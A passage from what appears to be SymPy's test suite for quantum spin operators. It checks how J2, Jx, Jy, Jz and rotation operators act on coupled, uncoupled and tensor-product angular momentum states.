) + hbar ** 2 * j * JyKet(j, m)
assert qapply(J2 * JzKet(j, m)) == hbar ** 2 * j ** 2 * JzKet(
j, m
) + hbar ** 2 * j * JzKet(j, m)
# Normal operators, coupled states
# Numerical
assert qapply(J2 * JxKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JxKetCoupled(
1, 1, (1, 1)
)
assert qapply(J2 * JyKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JyKetCoupled(
1, 1, (1, 1)
)
assert qapply(J2 * JzKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JzKetCoupled(
1, 1, (1, 1)
)
# Symbolic
assert qapply(
J2 * JxKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JxKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JxKetCoupled(
j, m, (j1, j2)
)
assert qapply(
J2 * JyKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JyKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JyKetCoupled(
j, m, (j1, j2)
)
assert qapply(
J2 * JzKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JzKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JzKetCoupled(
j, m, (j1, j2)
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JzKet(1, 1), JzKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JzKet(1, 1), JzKet(1, -1))
# Symbolic
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
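# Jx = (Jplus + Jminus)/2, so acting on Jz eigenstates mixes the m +/- 1 states
# with the usual ladder coefficients, while Jx eigenstates are simply scaled by
# hbar*m.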
def test_jx():
assert Commutator(Jx, Jz).doit() == -I * hbar * Jy
assert Jx.rewrite("plusminus") == (Jminus + Jplus) / 2
assert (
represent(Jx, basis=Jz, j=1)
== (represent(Jplus, basis=Jz, j=1) + represent(Jminus, basis=Jz, j=1)) / 2
)
# Normal operators, normal states
# Numerical
assert qapply(Jx * JxKet(1, 1)) == hbar * JxKet(1, 1)
assert qapply(Jx * JyKet(1, 1)) == hbar * JyKet(1, 1)
assert qapply(Jx * JzKet(1, 1)) == sqrt(2) * hbar * JzKet(1, 0) / 2
# Symbolic
assert qapply(Jx * JxKet(j, m)) == hbar * m * JxKet(j, m)
assert qapply(Jx * JyKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, 0, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j, mi1), (mi1, -j, j)
),
(mi, -j, j),
)
assert (
qapply(Jx * JzKet(j, m))
== hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(j, m + 1) / 2
+ hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(j, m - 1) / 2
)
# Normal operators, coupled states
# Numerical
assert qapply(Jx * JxKetCoupled(1, 1, (1, 1))) == hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jx * JyKetCoupled(1, 1, (1, 1))) == hbar * JyKetCoupled(1, 1, (1, 1))
assert (
qapply(Jx * JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * hbar * JzKetCoupled(1, 0, (1, 1)) / 2
)
# Symbolic
assert qapply(Jx * JxKetCoupled(j, m, (j1, j2))) == hbar * m * JxKetCoupled(
j, m, (j1, j2)
)
assert qapply(Jx * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, 0, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), 0, 0)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert (
qapply(Jx * JzKetCoupled(j, m, (j1, j2)))
== hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKetCoupled(j, m + 1, (j1, j2)) / 2
+ hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKetCoupled(j, m - 1, (j1, j2)) / 2
)
# Normal operators, uncoupled states
# Numerical
assert qapply(
Jx * TensorProduct(JxKet(1, 1), JxKet(1, 1))
) == 2 * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 1))
assert qapply(Jx * TensorProduct(JyKet(1, 1), JyKet(1, 1))) == hbar * TensorProduct(
JyKet(1, 1), JyKet(1, 1)
) + hbar * TensorProduct(JyKet(1, 1), JyKet(1, 1))
assert (
qapply(Jx * TensorProduct(JzKet(1, 1), JzKet(1, 1)))
== sqrt(2) * hbar * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * hbar * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert qapply(Jx * TensorProduct(JxKet(1, 1), JxKet(1, -1))) == 0
# Symbolic
assert qapply(
Jx * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m1 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar * m2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(Jx * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, 0, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
) + TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, 0, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert (
qapply(Jx * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == -hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert (
qapply(TensorProduct(Jx, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jx) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
)
# Symbolic
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m1 * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m2 * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, 0, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, 0, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert (
qapply(TensorProduct(Jx, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
)
assert (
qapply(TensorProduct(1, Jx) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
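# Jy = (Jplus - Jminus)/(2*I): the same ladder structure as Jx, but with factors
# of -I and +I on the raised and lowered components respectively.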
def test_jy():
assert Commutator(Jy, Jz).doit() == I * hbar * Jx
assert Jy.rewrite("plusminus") == (Jplus - Jminus) / (2 * I)
assert represent(Jy, basis=Jz) == (
represent(Jplus, basis=Jz) - represent(Jminus, basis=Jz)
) / (2 * I)
# Normal operators, normal states
# Numerical
assert qapply(Jy * JxKet(1, 1)) == hbar * JxKet(1, 1)
assert qapply(Jy * JyKet(1, 1)) == hbar * JyKet(1, 1)
assert qapply(Jy * JzKet(1, 1)) == sqrt(2) * hbar * I * JzKet(1, 0) / 2
# Symbolic
assert qapply(Jy * JxKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j, mi1, mi, 0, 0, pi / 2) * JxKet(j, mi1), (mi1, -j, j)),
(mi, -j, j),
)
assert qapply(Jy * JyKet(j, m)) == hbar * m * JyKet(j, m)
assert (
qapply(Jy * JzKet(j, m))
== -hbar * I * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(j, m + 1) / 2
+ hbar * I * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(j, m - 1) / 2
)
# Normal operators, coupled states
# Numerical
assert qapply(Jy * JxKetCoupled(1, 1, (1, 1))) == hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jy * JyKetCoupled(1, 1, (1, 1))) == hbar * JyKetCoupled(1, 1, (1, 1))
assert (
qapply(Jy * JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * hbar * I * JzKetCoupled(1, 0, (1, 1)) / 2
)
# Symbolic
assert qapply(Jy * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), 0, 0)
* Sum(
WignerD(j, mi1, mi, 0, 0, pi / 2) * JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jy * JyKetCoupled(j, m, (j1, j2))) == hbar * m * JyKetCoupled(
j, m, (j1, j2)
)
assert (
qapply(Jy * JzKetCoupled(j, m, (j1, j2)))
== -hbar
* I
* sqrt(j ** 2 + j - m ** 2 - m)
* JzKetCoupled(j, m + 1, (j1, j2))
/ 2
+ hbar
* I
* sqrt(j ** 2 + j - m ** 2 + m)
* JzKetCoupled(j, m - 1, (j1, j2))
/ 2
)
# Normal operators, uncoupled states
# Numerical
assert qapply(Jy * TensorProduct(JxKet(1, 1), JxKet(1, 1))) == hbar * TensorProduct(
JxKet(1, 1), JxKet(1, 1)
) + hbar * TensorProduct(JxKet(1, 1), JxKet(1, 1))
assert qapply(
Jy * TensorProduct(JyKet(1, 1), JyKet(1, 1))
) == 2 * hbar * TensorProduct(JyKet(1, 1), JyKet(1, 1))
assert (
qapply(Jy * TensorProduct(JzKet(1, 1), JzKet(1, 1)))
== sqrt(2) * hbar * I * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * hbar * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert qapply(Jy * TensorProduct(JyKet(1, 1), JyKet(1, -1))) == 0
# Symbolic
assert qapply(Jy * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j2, mi1, mi, 0, 0, pi / 2) * JxKet(j2, mi1), (mi1, -j2, j2)),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j1, mi1, mi, 0, 0, pi / 2) * JxKet(j1, mi1), (mi1, -j1, j1)),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
Jy * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m1 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar * m2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert (
qapply(Jy * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
+ -hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == -hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert (
qapply(TensorProduct(Jy, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jy) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== -hbar * sqrt(2) * I * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
)
# Symbolic
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j1, mi1, mi, 0, 0, pi / 2) * JxKet(j1, mi1), (mi1, -j1, j1)),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j2, mi1, mi, 0, 0, pi / 2) * JxKet(j2, mi1), (mi1, -j2, j2)),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m1 * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m2 * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
assert (
qapply(TensorProduct(Jy, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
)
assert (
qapply(TensorProduct(1, Jy) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
def test_jz():
assert Commutator(Jz, Jminus).doit() == -hbar * Jminus
# Normal operators, normal states
# Numerical
assert qapply(Jz * JxKet(1, 1)) == -sqrt(2) * hbar * JxKet(1, 0) / 2
assert qapply(Jz * JyKet(1, 1)) == -sqrt(2) * hbar * I * JyKet(1, 0) / 2
assert qapply(Jz * JzKet(2, 1)) == hbar * JzKet(2, 1)
# Symbolic
assert qapply(Jz * JxKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1), (mi1, -j, j)
),
(mi, -j, j),
)
assert qapply(Jz * JyKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JzKet(j, m)) == hbar * m * JzKet(j, m)
# Normal operators, coupled states
# Numerical
assert (
qapply(Jz * JxKetCoupled(1, 1, (1, 1)))
== -sqrt(2) * hbar * JxKetCoupled(1, 0, (1, 1)) / 2
)
assert (
qapply(Jz * JyKetCoupled(1, 1, (1, 1)))
== -sqrt(2) * hbar * I * JyKetCoupled(1, 0, (1, 1)) / 2
)
assert qapply(Jz * JzKetCoupled(1, 1, (1, 1))) == hbar * JzKetCoupled(1, 1, (1, 1))
# Symbolic
assert qapply(Jz * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JzKetCoupled(j, m, (j1, j2))) == hbar * m * JzKetCoupled(
j, m, (j1, j2)
)
# Normal operators, uncoupled states
# Numerical
assert (
qapply(Jz * TensorProduct(JxKet(1, 1), JxKet(1, 1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
- sqrt(2) * hbar * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
)
assert (
qapply(Jz * TensorProduct(JyKet(1, 1), JyKet(1, 1)))
== -sqrt(2) * hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
- sqrt(2) * hbar * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
)
assert qapply(
Jz * TensorProduct(JzKet(1, 1), JzKet(1, 1))
) == 2 * hbar * TensorProduct(JzKet(1, 1), JzKet(1, 1))
assert qapply(Jz * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
# Symbolic
assert qapply(Jz * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(Jz * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
Jz * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m1 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar * m2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
# Uncoupled operators, uncoupled states
# Numerical
assert (
qapply(TensorProduct(Jz, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 0), JxKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jz) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert (
qapply(TensorProduct(Jz, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== -sqrt(2) * I * hbar * TensorProduct(JyKet(1, 0), JyKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jz) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== sqrt(2) * I * hbar * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == hbar * TensorProduct(JzKet(1, 1), JzKet(1, -1))
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == -hbar * TensorProduct(JzKet(1, 1), JzKet(1, -1))
# Symbolic
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m1 * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m2 * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
def test_rotation():
a, b, g = symbols("a b g")
j, m = symbols("j m")
# Uncoupled
answ = [
JxKet(1, -1) / 2 - sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, 1) / 2,
JyKet(1, -1) / 2 - sqrt(2) * JyKet(1, 0) / 2 + JyKet(1, 1) / 2,
JzKet(1, -1) / 2 - sqrt(2) * JzKet(1, 0) / 2 + JzKet(1, 1) / 2,
]
fun = [state(1, 1) for state in (JxKet, JyKet, JzKet)]
for state in fun:
got = qapply(Rotation(0, pi / 2, 0) * state)
assert got in answ
answ.remove(got)
assert not answ
arg = Rotation(a, b, g) * fun[0]
assert qapply(arg) == (
-exp(-I * a) * exp(I * g) * cos(b) * JxKet(1, -1) / 2
+ exp(-I * a) * exp(I * g) * JxKet(1, -1) / 2
- sqrt(2) * exp(-I * a) * sin(b) * JxKet(1, 0) / 2
+ exp(-I * a) * exp(-I * g) * cos(b) * JxKet(1, 1) / 2
+ exp(-I * a) * exp(-I * g) * JxKet(1, 1) / 2
)
# dummy effective
assert str(qapply(Rotation(a, b, g) * JzKet(j, m), dummy=False)) == str(
qapply(Rotation(a, b, g) * JzKet(j, m), dummy=True)
).replace("_", "")
# Coupled
ans = [
JxKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * JxKetCoupled(1, 0, (1, 1)) / 2
+ JxKetCoupled(1, 1, (1, 1)) / 2,
JyKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * JyKetCoupled(1, 0, (1, 1)) / 2
+ JyKetCoupled(1, 1, (1, 1)) / 2,
JzKetCoupled(1, -1, (1, 1)) / 2
